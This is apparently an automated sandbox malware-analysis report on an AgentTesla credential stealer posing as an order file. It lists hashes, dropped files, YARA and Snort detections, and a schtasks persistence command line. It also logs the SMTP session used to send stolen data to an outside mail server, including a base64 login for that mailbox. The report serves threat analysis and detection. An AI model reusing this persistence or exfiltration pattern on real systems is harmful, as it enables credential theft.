 | Order 46975986.xlsb | malicious | 116.12.51.202
 | PO 97179275.xlsb | malicious | 116.12.51.202
 | Order 46975986.xlsb | malicious | 116.12.51.202
 | Order 2522592.xlsb | malicious | 116.12.51.202
 | PO 97179275.xlsb | malicious | 116.12.51.202
 | Order 2522592.xlsb | malicious | 116.12.51.202
 | AWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exe | malicious | 113.197.35.43
 | SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exe | malicious | 113.197.35.43

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.log
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1314
                                                                    Entropy (8bit):5.350128552078965
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1645
                                                                    Entropy (8bit):5.172468542885359
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBeNtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3e
                                                                    MD5:6D873C913C6BA247539E8D716FDF3A91
                                                                    SHA1:9CDD0F46D6C29970CE6E9D2B60978BD2A4B5419F
                                                                    SHA-256:098DBD4D3FA82AEAD5B22CA909E2FF9281FC1970123DF7952AE43577FB556BC0
                                                                    SHA-512:1683A3EF8053E0E2A8ECE7349CA1E2104164E5D870A9A748DCCD4856CF073CF5B3C088A29D44BD8D354914BC36578F4037B64028396CEB59D0869677DB2061F5
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                    C:\Users\user\AppData\Roaming\aUkURZiJ.exe
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):562688
                                                                    Entropy (8bit):7.620214969982571
                                                                    Encrypted:false
                                                                    SSDEEP:12288:j2KwyZTuK+jJ8CXnZQ6VlgyoRPWHN3dvos/:jhyVpQ6VG+7v
                                                                    MD5:66CBE976594F666D5440264A4084B21F
                                                                    SHA1:944C8819E41AD59333527141A7FD5180253969E1
                                                                    SHA-256:460EB4667362671BE2BE1E94AFE56E73331C3A3CD58B028E49EC135FEC8888A9
                                                                    SHA-512:1EBB035FD7CEAB82F4EE270E66B097958E8B57805897DCAFC4736E82E64961EC5DF61AF8A0EC78D9D119D2EC235D955559CFE360587E46915AA9C5450C93DA1E
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                    Reputation:low
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k...............P.................. ........@.. ....................................@.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......X...............`%...............................................0..........*....0............ $.cG ..xa%..^E................+.(....(...... .?.Z .P4Ka+...... .... ..xa%..^E................,...+*(.....o..... .,).Z .C6.a+... ..kZ ....a+.*........?@.......0..*..........( ......(!......("......(#......($....*...0..D........ .'.. b.[.a%..^E....!...........+..(....o....(%.... }$D.Z .i oa+..*.0..:.........(&... ..Y. .i.a%..^E................+... .J.IZ D.<a+.*...0..w...

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.620214969982571
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File size:562688
                                                                    MD5:66cbe976594f666d5440264a4084b21f
                                                                    SHA1:944c8819e41ad59333527141a7fd5180253969e1
                                                                    SHA256:460eb4667362671be2be1e94afe56e73331c3a3cd58b028e49ec135fec8888a9
                                                                    SHA512:1ebb035fd7ceab82f4ee270e66b097958e8b57805897dcafc4736e82e64961ec5df61af8a0ec78d9d119d2ec235d955559cfe360587e46915aa9c5450c93da1e
                                                                    SSDEEP:12288:j2KwyZTuK+jJ8CXnZQ6VlgyoRPWHN3dvos/:jhyVpQ6VG+7v
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k...............P.................. ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x48aabe
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0xAC6B97B1 [Wed Aug 31 16:45:37 2061 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes following the jmp stub are zero padding, which disassembles as this instruction)

                                                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8aa6c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8c000 | 0x5a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                    Sections

                                                                    Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
                                                                    .text  | 0x2000          | 0x88ac4      | 0x88c00  | False    | 0.813471206581  | data      | 7.63105429026  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc  | 0x8c000         | 0x5a0        | 0x600    | False    | 0.421223958333  | data      | 4.0719135687   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x8e000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    Name        | RVA     | Size  | Type                                                                            | Language | Country
                                                                    RT_VERSION  | 0x8c0a0 | 0x314 | data                                                                            |          |
                                                                    RT_MANIFEST | 0x8c3b4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators     |          |

                                                                    Imports

                                                                    DLL         | Import
                                                                    mscoree.dll | _CorExeMain

                                                                    Version Infos

                                                                    Description      | Data
                                                                    Translation      | 0x0000 0x04b0
                                                                    LegalCopyright   | Copyright 2019
                                                                    Assembly Version | 1.0.0.0
                                                                    InternalName     | VHbIB.exe
                                                                    FileVersion      | 1.0.0.0
                                                                    CompanyName      |
                                                                    LegalTrademarks  |
                                                                    Comments         |
                                                                    ProductName      | ConnectFour
                                                                    ProductVersion   | 1.0.0.0
                                                                    FileDescription  | ConnectFour
                                                                    OriginalFilename | VHbIB.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp                 | Protocol | SID     | Message                             | Source Port | Dest Port | Source IP   | Dest IP
                                                                    12/02/21-16:51:59.303417  | TCP      | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49831       | 587       | 192.168.2.5 | 113.197.35.43

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
                                                                    Dec 2, 2021 16:51:54.780991077 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:55.049312115 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:55.049439907 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:57.680073023 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:57.680427074 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:57.948682070 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:57.948971033 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:57.949990034 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:58.218070984 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:58.218441010 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:58.487137079 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:58.487844944 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:58.756607056 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:58.756807089 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.032618999 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:59.032835960 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.302530050 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:59.303416967 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.303488970 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.304220915 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.304236889 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43
                                                                    Dec 2, 2021 16:51:59.572067976 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:59.572181940 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:59.805361986 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5
                                                                    Dec 2, 2021 16:51:59.845793009 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43

                                                                    UDP Packets

                                                                    Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
                                                                    Dec 2, 2021 16:51:53.977710962 CET | 50394       | 53        | 192.168.2.5 | 8.8.8.8
                                                                    Dec 2, 2021 16:51:54.132426977 CET | 53          | 50394     | 8.8.8.8     | 192.168.2.5

                                                                    DNS Queries

                                                                    Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name                      | Type           | Class
                                                                    Dec 2, 2021 16:51:53.977710962 CET | 192.168.2.5 | 8.8.8.8 | 0x6725   | Standard query (0) | mail.kyowasecurity.com.sg | A (IP address) | IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                      | CName | Address       | Type           | Class
                                                                    Dec 2, 2021 16:51:54.132426977 CET | 8.8.8.8   | 192.168.2.5 | 0x6725   | No error (0) | mail.kyowasecurity.com.sg |       | 113.197.35.43 | A (IP address) | IN (0x0001)

                                                                    SMTP Packets

                                                                    Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP       | Commands
                                                                    Dec 2, 2021 16:51:57.680073023 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 220 spinworksmail2020.spinworks.com.sg ESMTP Postfix
                                                                    Dec 2, 2021 16:51:57.680427074 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | EHLO 128757
                                                                    Dec 2, 2021 16:51:57.948971033 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 250-spinworksmail2020.spinworks.com.sg
                                                                                                       |             |           |               |               | 250-PIPELINING
                                                                                                       |             |           |               |               | 250-SIZE 30720000
                                                                                                       |             |           |               |               | 250-ETRN
                                                                                                       |             |           |               |               | 250-STARTTLS
                                                                                                       |             |           |               |               | 250-AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN
                                                                                                       |             |           |               |               | 250-ENHANCEDSTATUSCODES
                                                                                                       |             |           |               |               | 250-8BITMIME
                                                                                                       |             |           |               |               | 250-DSN
                                                                                                       |             |           |               |               | 250 CHUNKING
                                                                    Dec 2, 2021 16:51:57.949990034 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | AUTH login bWFya2V0aW5nQGt5b3dhc2VjdXJpdHkuY29tLnNn
                                                                    Dec 2, 2021 16:51:58.218070984 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 334 UGFzc3dvcmQ6
                                                                    Dec 2, 2021 16:51:58.487137079 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 235 2.7.0 Authentication successful
                                                                    Dec 2, 2021 16:51:58.487844944 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | MAIL FROM:<marketing@kyowasecurity.com.sg>
                                                                    Dec 2, 2021 16:51:58.756607056 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 250 2.1.0 Ok
                                                                    Dec 2, 2021 16:51:58.756807089 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | RCPT TO:<marketing@kyowasecurity.com.sg>
                                                                    Dec 2, 2021 16:51:59.032618999 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 250 2.1.5 Ok
                                                                    Dec 2, 2021 16:51:59.032835960 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | DATA
                                                                    Dec 2, 2021 16:51:59.302530050 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 354 End data with <CR><LF>.<CR><LF>
                                                                    Dec 2, 2021 16:51:59.304236889 CET | 49831       | 587       | 192.168.2.5   | 113.197.35.43 | .
                                                                    Dec 2, 2021 16:51:59.805361986 CET | 587         | 49831     | 113.197.35.43 | 192.168.2.5   | 250 2.0.0 Ok: queued as CFC00DFA092

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Memory Usage

                                                                    High Level Behavior Distribution

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time: 16:49:48
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: "C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe"
                                                                    Imagebase: 0x280000
                                                                    File size: 562688 bytes
                                                                    MD5 hash: 66CBE976594F666D5440264A4084B21F
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: .Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation: low

                                                                    General

                                                                    Start time: 16:50:01
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                                                                    Imagebase: 0x1270000
                                                                    File size: 185856 bytes
                                                                    MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: C, C++ or other language
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:50:02
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit): false
                                                                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase: 0x7ff7ecfc0000
                                                                    File size: 625664 bytes
                                                                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: C, C++ or other language
                                                                    Reputation: high

                                                                    General

                                                                    Start time: 16:50:03
                                                                    Start date: 02/12/2021
                                                                    Path: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    Wow64 process (32bit): true
                                                                    Commandline: {path}
                                                                    Imagebase: 0xa30000
                                                                    File size: 562688 bytes
                                                                    MD5 hash: 66CBE976594F666D5440264A4084B21F
                                                                    Has elevated privileges: true
                                                                    Has administrator privileges: true
                                                                    Programmed in: .Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.517392444.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.284209429.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.284592595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation: low

                                                                    Disassembly

                                                                    Code Analysis

                                                                      Executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /u='$E4W:$J[/J$J[/J
                                                                      • API String ID: 0-1730836407
                                                                      • Opcode ID: 4b25390f63b5dbbd60463509ab9657a3e5d6e27151cc0dfd34f6e170e5cea5fc
                                                                      • Instruction ID: 7302b7c5a0513cba90d7af5041a04c89a8d656853c3f32694f4361f567eec455
                                                                      • Opcode Fuzzy Hash: 4b25390f63b5dbbd60463509ab9657a3e5d6e27151cc0dfd34f6e170e5cea5fc
                                                                      • Instruction Fuzzy Hash: 50A137B4E012098FCB48DFE9C9845DEFBF2FF89310F14966AD415AB384E73499428B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: b8dc3f96e80749a74367ef7bc1514c835cf49c0f6e61f3c48af11165ce2eed43
                                                                      • Instruction ID: ff7ce0de3051e31fd927dcb7a82f6aa1645befdc756797383e5dd5af5d700dc9
                                                                      • Opcode Fuzzy Hash: b8dc3f96e80749a74367ef7bc1514c835cf49c0f6e61f3c48af11165ce2eed43
                                                                      • Instruction Fuzzy Hash: 8CF1AFB5905286CFC744DFA9D4808EEFFB1FF4A310F298266C455AB216D3359A82CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: 769cd97fae878ae04808e74c234187959f617ff3990eaf8173381df8ca8a1790
                                                                      • Instruction ID: a65d509a225e41ea13dc9ef5c72fd4bf47d2fe587ed2b6d1868fc02fe581d1bb
                                                                      • Opcode Fuzzy Hash: 769cd97fae878ae04808e74c234187959f617ff3990eaf8173381df8ca8a1790
                                                                      • Instruction Fuzzy Hash: FFE1AFB4D05246CFCB44DFA9C4808AEFBB1FF8A310F25C256C555AB216D3359A82CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (..$(~*z$Lbvw
                                                                      • API String ID: 0-851377781
                                                                      • Opcode ID: d20a57a6207a317e57cb33ad260073691d1c90d5b8620cf7c3b291c4a3875781
                                                                      • Instruction ID: 6e3345c4abea26b07c0088a7d10d95152cc2ec50b133f9c58e605a9d7609584c
                                                                      • Opcode Fuzzy Hash: d20a57a6207a317e57cb33ad260073691d1c90d5b8620cf7c3b291c4a3875781
                                                                      • Instruction Fuzzy Hash: F9D1A3B1F00206DFCB44EFE9D5406AEBBF6EF89254F248629C455BB384EB3499418B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !*y$!*y$ftX
                                                                      • API String ID: 0-3350777166
                                                                      • Opcode ID: 3017729069a2ae4025e816968ec1253b81a059edd0d3d20314412a4e6f7d1032
                                                                      • Instruction ID: 98f5c7eb1dd2e5c45ba61d3a065382cb84402a927b90448cd84986b5626b479a
                                                                      • Opcode Fuzzy Hash: 3017729069a2ae4025e816968ec1253b81a059edd0d3d20314412a4e6f7d1032
                                                                      • Instruction Fuzzy Hash: A9D149B4E1020ACFCB44DF99C5809AEFBB6FF89300F158665D516AB319D7359A82CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `pv
                                                                      • API String ID: 0-567263181
                                                                      • Opcode ID: 671024a63e45efeeaf7d0f6f89d47e70e619d34cc8cba3a61a7a6d8fbb55ae3f
                                                                      • Instruction ID: b7b12406f0a4d2909317e99f47a09f4e355c6b696fe7e1368cbd0f5ee07c236d
                                                                      • Opcode Fuzzy Hash: 671024a63e45efeeaf7d0f6f89d47e70e619d34cc8cba3a61a7a6d8fbb55ae3f
                                                                      • Instruction Fuzzy Hash: 0C4300B4A01219CFCBA4DF68C988A9DB7B6FF85314F158699D449AB360DB30ED81CF41
                                                                      Uniqueness

